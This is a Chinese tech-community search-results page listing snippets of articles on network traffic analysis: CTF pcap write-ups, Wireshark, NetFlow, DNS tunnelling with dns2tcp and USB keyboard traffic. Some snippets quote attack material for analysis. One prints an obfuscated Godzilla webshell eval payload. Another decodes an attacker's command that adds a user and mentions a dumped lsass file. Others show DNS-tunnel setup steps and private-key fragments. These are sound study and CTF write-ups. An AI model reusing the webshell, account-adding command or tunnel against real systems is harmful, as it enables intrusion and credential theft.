- 综合排序
- 最热优先
- 最新优先
- 来自专栏用户10781703的专栏
CTF之misc杂项解题技巧总结(2)——流量分析
概括来讲在比赛中的流量分析有以下三个方向: 1、流量包修复 2、协议分析 3、数据提取 我们首先用一个合天的实验来对流量分析进行初探(wireshark之文件还原) 场景: 黑客通过ARP欺骗,使用 显示过滤器基础语法 Protocol String1 String2 ComparisonOperator Value Logical Operations other expression Protocol 可以使用大量位于OSI模型第2至7层的协议。 的封包 tcp.dport == 25 //显示目的TCP端口号为25的封包 如果过滤器语法是正确的,表达式背景为绿色,否则为红色 前文中的wireshark文件还原就可以说是一个很基础的数据包流量分析 2、提取文件中的公钥 openssl rsa -in test.key -pubout -outtest_pub.key -in指定输入文件,-out指定提取生成公钥的文件名。
9.3K11编辑于 2023-12-23 - 来自专栏全栈程序员必看
NetFlow流量分析
NetFlow是基于流的流量分析技术,其中每条流主要包含以下字段:源IP地址、目的IP地址、源端口号、目的端口号、IP协议号、服务类型、TCP标记、字节数、接口号等。 NetFlow是一个轻量级的分析工具,他只读取了报文中的一些重要字段不包含原始数据,并不属于全流量分析。 NetFlow网络异常流量分析 NetFlow流记录的主要信息和功能: who:源IP地址 when:开始时间、结束时间 where:源IP地址、源端口号、目标IP地址、目标端口号(访问路径) what *|Others|64851|3|2|0|0|1|1|40|1 192.168.*.*|60.18.*. *|Others|64851|3|2|3227|53|6|1|40|1 192.168.*.*|60.18.*.
1.4K10编辑于 2022-08-23 - 来自专栏红蓝对抗
哥斯拉流量分析
这是webshell流量分析哥斯拉篇 朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把“亿人安全“设为星标”,否则可能就看不到了啦 原文链接:先知 https://xz.aliyun.com 包中会有两个传参分别是一句话设置的密码与在客户端设置的密钥 eval(base64_decode(strrev(urldecode('K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD +veZNlHQ9y0XBjrWjSoTOltoQbU3tm32EMQiBBIJt2Yulv9craTyUtRCLtjhR2t5SwMDGgyy84cHn/1qM3RXTsaw2umpLNiRVms5uYPElhEsh8v3gh /UkkZcV//sV7AMfzKpRUKLB35+QjDtXjbwE9ox8yiUOBrhF4DOSjGHD/D2gaPJtDXIZZhkSTaf+wpFy3um2A7C1YZKvrxNsEt8uDz5dt2MYHrlam 返回包 解码 符合预期 2.
1.3K10编辑于 2024-05-06 - 来自专栏全栈程序员必看
流量分析入门
前言 个人一直对CTF比赛中MISC中流量分析这一块感兴趣…但好像之前参加的培训没有涉及到。 正好看到了一些相关书籍资料,自己向前辈们学习以后整理一些资料来总结一下(本人是个很菜…还没入门的pwn手) 互联网五层模型 在计算机网络这门课中介绍了OSI模型及互联网五层模型: 在我们使用抓包软件进行流量分析的时候 在虚拟机中运行(注意给的病毒啥的最好在虚拟机里运行),然后看是一个helloworld的程序 打开wireshark进行分析,搜索字符串flag{ 得到flag: 结语 这是一篇偏向入门的流量分析总结
73810编辑于 2022-08-14 - 来自专栏一己之见安全团队
浅尝流量分析
流量分析是安服仔们必备的一个技能,up其实接触的全流量设备不多,也就用过科莱的,产品级的全流量设备最大的特征就是简化了很多查询语句和查询条件,以及优化了界面、逻辑等,这次虽然是用小鲨鱼来展示,就不具体到查询语句上了 以上两个例子简单的给出一点思考空间而已,毕竟只是初入流量分析,更重要的是学会怎么使用设备,以下就大致给出流量分析的步骤供各位师傅参考。 大总结: 总的来说全流量分析设备确实是个好东西,初入浅尝流量分析基本是以健全的安全拓扑为前提,综合利用而已,主要为掌握攻击行为的具体数据流向和特征,这里小师傅们想深度联系的推荐去各大靶场找流量分析的包打一打
39310编辑于 2024-05-17 - 来自专栏Python与算法之美
单样本微调给ChatGLM2注入知识~
同时这也是一篇非常有趣好玩,具有强大实操性的ChatGLM2微调喂饭级教程。 我们演示了使用AdaLoRA算法,使用1条样本对ChatGLM2-6b实施微调。 几分钟就成功注入了"梦中情炉"有关的知识 summary: (1) 只需要1条样本,很少的训练时间,就可以通过微调给LLM注入知识。 学习时无需新知识特别多的样本,学习后原有的庞大知识和能力可以基本不受影响。 ,history = []) print(response) 七,总结延伸 我们演示了使用AdaLoRA算法,使用1条样本对ChatGLM2实施微调。 summary: (1) 只需要1条样本,很少的训练时间,就可以通过微调给LLM注入知识。 (2) LLM是一种知识数据库,支持增删改查。通过微调可以增删修改知识,通过条件生成可以查询提取知识。
1.2K20编辑于 2023-09-05 - 来自专栏全栈程序员必看
wireshark流量分析实战
下面是在网上找的数据包资源,来自2018的铁人三项流量分析题目,一共有二十题,共有六个数据包,本人习惯一题一题来,不过可能是个很不好的习惯 1.黑客的IP是多少 很明显这也是我们平常干的事情phpinfo 黑客IP:202.1.1.2 2.服务器1.99的web服务器使用的CMS及其版本号(请直接复制) 一般网站的CMS会显示在网站底部,找到一个以192.168.1。 3/4号端口:1–>2,3,4 这里提到监控端口,还是设置过滤器慢慢找 ip.addr == 192.168.0.1 && http &&contains “port” 很明显了,监控端口是3,被监控是 1,2 18.路由器一共有几个接口? LAN1、LAN2这四个接口都打开了,最后这个LAN3接口是关闭的 19.路由器的系统路由表中一共有几条?
1.9K32编辑于 2022-08-12 - 来自专栏zhangdd.com
流量分析常见指标
流量分析常见指标 1)基础分析(PV,IP,UV) Ø 趋势分析:根据选定的时段,提供网站流量数据,通过流量趋势变化形态,为您分析网站访客的访问规律、网站发展状况提供参考。 2)来源分析 Ø 来源分类:提供不同来源形式(直接输入、搜索引擎、其他外部链接、站内来源)、不同来源项引入流量的比例情况。
1.1K10发布于 2018-08-01 BUUCTF 流量分析 1
密文: 下载附件解压,得到流量分析.pcap和流量分析.txt 解题思路: 1、先看流量分析.txt,看hint二去pcap包里找“KEY”。 流量分析 200pt 提示一:若感觉在中间某个容易出错的步骤,若有需要检验是否正确时,可以比较MD5: 90c490781f9c320cd1ba671fcb112d1c 提示二:注意补齐私钥格式 -- / QbRcZ/eHBulVQLlk5M6RVs9BLI9X08RAl7EcwumiRfWas6kCQQDvqC0dxl2wIjwN czILcoWLig2c2u71Nev9DrWjWHU8eHDuzCJWvOUAHIrkexddWEK2VHd +HLJ1/wH /5pfc3AmEyRdfyx6zwUCQCAH4SLJv/kprRz1a1gx8FR5tj4NeHEFFNEgq1gmiwmH 2STT5qZWzQFz8NRe+/otNOHBR2Xk4e8IS flag: DDCTF{0ca2d8642f90e10efd9092cd6a2831c0} flag{0ca2d8642f90e10efd9092cd6a2831c0}
1.5K10编辑于 2025-10-14- 来自专栏生信小驿站
R 数据质量分析①
数据质量分析 数据质量分析是数据挖掘中数据准备的最重要一环,是数据处理的前体。数据质量分分析主要任务是识别脏数据。 TRUE TRUE [196] TRUE TRUE TRUE TRUE FALSE TRUE > is.na(a) 日期 销量 [1,] FALSE FALSE [2, 2. 缺失值处理 行删除法:数据集中含有缺失值的行都会被删除,一般假定缺失数据是完全随机产生的,并且缺失值只是很少一部分,对结果不会造成大的影响。 即:要有足够的样本量,并且删除缺失值后不会有大的偏差! newdata<-na.omit(a) newdata<-a[complete.cases(a),] 删除含有缺失值的列 t(na.omit(t(a))) na_flag <- apply(is.na(a), 2,
1.4K10发布于 2018-08-27 - 来自专栏全栈程序员必看
产品流量分析
这次和大家分享一下最近对流量分析的一些理解。 流量是产品获得用户的第一步,没有流量就没有转化与营收。对于流量的分析在产品日常运营效果监控中有着非常重要意义。
98430编辑于 2022-09-05 - 来自专栏乐沙弥的世界
Oracle 索引质量分析
下面给出了演示以及索引创建的基本指导原则,最后给出了索引质量分析脚本。 NORMAL ASC I_TDCL_ARC_PL_STK PL_CD 2 NORMAL ASC PK_CLIENT_TRADE_TBL REF_ID 2 该列是否经常使用“ = ”作为常用查询条件 列上的离散度 组合列经常按何种顺序排序 哪些列会作为附件性列被添加 3、索引质量分析脚本 Good' WHEN (ROUND (i.clustering_factor / t.num_rows * 100)) BETWEEN 16 AND 25 THEN '2-Fair
97210发布于 2018-08-13 - 来自专栏简言之
CTF-流量分析总结
流量分析经典题型 CTF题型主要分为流量包修复、数据提取、WEB流量包分析、USB流量包分析、无线密码破解和工控流量包分析等等。 URL,738号数据包有个需要调用函数CheckFile,并且前面的5个数据包url的路径一样, 所以从第一个开始,后5个数据包是flag.rar内容 我们将分组字节流中的原始数据分别保存为1、2、 a2FrYSBrYWthIC9hZGQmZWNobyBbU10mY2QmZWNobyBbRV0= 解码后 cd/d"C:\phpStudy\WWW\b2evolution\install\test\" 黑客在内网主机中添加的用户名和密码是多少 kaka:kaka 3.黑客从内网服务器中下载下来的文件名 lsass.exe_180208_185247.dmp 参考: CTF流量分析之wireshark使用 CTF流量分析之题型深度解析 CTF| 吃个鸡,一起破流量分析题吧!
6K32编辑于 2022-12-29 - 来自专栏devops探索
linux下流量分析工具
在日常的运维工作中,我们经常需要去关注网卡流量的使用情况,看是否处于正常的使用范围内,如果入网或者出网有异常升高或者降低,我们都要及早的去发现,来进行评估是否处于异常状态,而去发现这个异常,就需要我们熟悉常用的流量分析查看工具 参数介绍 1 2 3 4 5 -a: 指定全部数据的刷新时间,单位是秒,默认是300秒 -i: 进入网卡的流量图的显示比例最大值设置 -m: 不显示流量图,只显示统计数据 -t: 显示数据的刷新时间间隔 peak: 流量峰值 rates: 分别表示过去2s,10s,40s的平均流量 iftop相关参数: 1 2 3 4 5 -i: 指定监测的网卡 -B: 以bytes为单位显示流量,默认是按位(bits 参数介绍 bmon界面参数介绍 1 2 RX: 表示每秒接收数据 TX: 表示每秒发送数据 ? DEV 3 2 # sar -n DEV 3 2 Linux 3.10.0-693.2.2.el7.x86_64 (blog_site) 08/12/2018 _x86_64_
4.8K40发布于 2020-07-31 - 来自专栏全栈程序员必看
网络流量分析
网络流量分析 具体要求 收集自己本机的网络流量数据(至少1小时)并进行数据显示。 可用wireshark软件抓包 网络流量大小的时序图,可按每半分钟、每分钟、每五分钟、每十分钟进行分别显示。
1.8K10编辑于 2022-08-11 - 来自专栏FreeBuf
DNS隧道流量分析
/configure make;make install 服务器端 server/dns2tcpd 客户端 Linux: client/dns2tcpc windows: 云盘直接下载 windows版本,或者下载 dns2tcpc.exe 实验测试 服务器端 1.创建配置文件 Vim/etc/dns2.conf Listen = 192.168.1.6(Linux服务器的IP /dns2tcpd -f/etc/dns2.conf 启动之后会将DNS的隧道流量根据客户端选择的资源使用对应的服务建立连接 出现如下错误需要关闭服务器自带的dns解析服务 ? 客户端 dns2tcpc -r ssh-z ns.dnstuneltest.com 192.168.1.6 -l 8888 -d 2 r:指定对应的资源,前面服务器需开启指定的资源 -z:自定解析的dns 域名,如果域名已经添加的公网的DNS解析则可以省略后面的IP -l:端口 -d:是否为调试模式 2 等级可以省略 ?
3.3K10发布于 2019-10-10 - 来自专栏全栈程序员必看
USB流量分析「建议收藏」
2. 此题为键盘数据包 友情链接USB协议,查找值与具体键位的对应关系: http://www.usb.org/developers/hidpage/Hut1_12v2.pdf 根据第53页 usb keyboard "R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2" , 0x20:"3", 0x21:"4", 0x22:"5", 0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"\n", 0x2a:"[ DEL]", 0X2B:" ", 0x2C:" ", 0x2D:"-", 0x2E:"=", 0x2F:"[", 0x30:"]", 0x31:"\\", 0x32:"~", 0x33:";",
1.6K30编辑于 2022-09-05 状态监控与流量分析
作用:显示和操作路由、网络设备、接口等网络配置信息,功能比ifconfig更强大。
50700编辑于 2025-03-17- 来自专栏刘君君
管程和信号量分析
可以看到在处理以上场景时,也就是图中第 4 步,T1 线程被唤醒后会从 “条件” 等待队列转移到入口队列,T2 线程会继续执行,最后 T1 从入口队列出来继续执行。 ? T2(如果 Signal 队列为空才去入口队列调度),T2 重新开始。 1.3 Brinch Hanson 模型 该模型仅允许线程完成(从 Monitor 退出时)发出信号唤醒,也即是第 4 步 T2 线程会一直执行完再去唤醒 T1 。 ? 回到问题 TOP 2 ,可以明白其参数的意义。 也就是同时只允许2个线程处理,当第三个线程 T3 来的时候 T1、T2 还没处理完的情况下,T3 会阻塞到 T1 或 T2 执行完成并且通过 V 操作(加1,释放一个位置给别人),这个时候 T3 进行
1.9K30发布于 2020-02-10 - 来自专栏网络安全【故里】
流量分析之题型解析
https://static2.ichunqiu.com/icq/resources/fileupload/CTF/BSRC/2017/BSRC3-1/findtheflag.cap 用Wireshark
38610编辑于 2023-04-16
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号